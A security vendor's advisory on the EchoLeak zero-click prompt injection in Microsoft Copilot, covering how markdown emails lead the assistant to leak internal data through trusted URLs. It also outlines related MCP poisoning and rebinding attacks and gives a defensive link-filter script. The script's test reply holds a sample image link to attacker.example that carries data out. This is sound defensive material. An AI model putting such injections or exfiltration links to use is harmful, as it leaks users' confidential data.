  • CVSS: 9.3 (Critical)
  • Discovered by: Aim Security
  • Patched by Microsoft: Yes, June 2025 Patch Tuesday
  • Exploitation in the wild: No confirmed cases

How It Works:

  • Attackers embed malicious prompt payloads in markdown-formatted content (e.g., emails)
  • Copilot’s RAG engine combines untrusted input with sensitive internal context
  • Sensitive data is silently exfiltrated via Teams and SharePoint URLs

Risk Highlights:

  • No clicks or user interaction needed (true zero-click)
  • Exploits LLM Scope Violation and Retrieval-Augmented Generation (RAG) flaws
  • Can leak confidential business info, reports, credentials

Related AI Threats:

  • Full-Schema Poisoning (FSP): Tool poisoning in Model Context Protocol (MCP) allows LLMs to be misled via fake tool behaviors
  • MCP Rebinding Attack: Uses DNS rebinding and Server-Sent Events (SSE) to exfiltrate data from localhost MCP servers

Recommendations:

  • Review AI assistant usage policies and data access controls
  • Limit AI exposure to sensitive document sources
  • Monitor AI-driven data access logs for anomalies
  • Enforce strong validation of AI inputs and origins

Reference:
https://thehackernews.com/2025/06/zero-click-ai-vulnerability-exposes.html
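The exfiltration path described above runs through markdown links and images in assistant output, so one defensive control an organisation can put in front of its own assistants is an output filter that refuses links to hosts outside an allow-list and flags allowed hosts carrying suspiciously long query strings (the channel through which retrieved data can be smuggled out via trusted domains). The following is an added example of such a filter; it is not Microsoft's fix, not Aim Security's research code, and does not reproduce the EchoLeak payload. The allow-list, thresholds and the sample assistant reply are constructed for illustration.

```python
from __future__ import annotations
import re
from urllib.parse import urlsplit

# Inline markdown links and images: [text](url "title") or ![alt](url)
MD_LINK = re.compile(r"!?\[[^\]]*\]\(\s*<?([^)\s>]+)>?[^)]*\)")


def extract_urls(markdown: str) -> list[str]:
    return [m.group(1) for m in MD_LINK.finditer(markdown)]


def classify_url(url: str, allowed_hosts: set[str], max_query_len: int = 64) -> str:
    """Return 'allow', 'suspect' or 'block' for a URL found in assistant output.

    * non-http(s) schemes and hosts outside the allow-list are blocked: an image
      or link there is a channel to an attacker-controlled server;
    * an allowed host carrying an unusually long query string is 'suspect':
      data can be smuggled through trusted domains as URL parameters."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return "block"
    host = (parts.hostname or "").lower()
    if not any(host == h or host.endswith("." + h) for h in allowed_hosts):
        return "block"
    if len(parts.query) > max_query_len:
        return "suspect"
    return "allow"


def sanitize_output(markdown: str, allowed_hosts: set[str]) -> tuple[str, list[tuple[str, str]]]:
    """Strip any link/image that is not 'allow', returning the cleaned text and
    a findings list of (verdict, url) for logging and alerting."""
    findings: list[tuple[str, str]] = []

    def _replace(m: re.Match) -> str:
        verdict = classify_url(m.group(1), allowed_hosts)
        if verdict == "allow":
            return m.group(0)
        findings.append((verdict, m.group(1)))
        return "[link removed]"

    return MD_LINK.sub(_replace, markdown), findings


if __name__ == "__main__":
    # Constructed assistant reply; hostnames use reserved example names.
    reply = (
        "Q2 summary: [Q2 budget](https://contoso.sharepoint.com/sites/fin/Q2.docx)\n"
        "![chart](https://attacker.example/c.png?d=Q2%20budget%20shortfall)\n"
        "[ref](https://contoso.sharepoint.com/x?note=" + "A" * 200 + ")\n"
    )
    clean, found = sanitize_output(reply, {"contoso.sharepoint.com"})
    print(clean)
    for verdict, url in found:
        print(verdict, url[:60])
```

A filter like this is a compensating control, not a substitute for limiting what the retrieval layer is allowed to pull into the prompt in the first place; it catches the exfiltration channel, not the injection.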

Ready to get started?

Contact us to arrange a half day
Managed SOC and XDR workshop in Dubai
© 2025 HawkEye – Managed CSOC and XDR powered by DTS Solution. All Rights Reserved.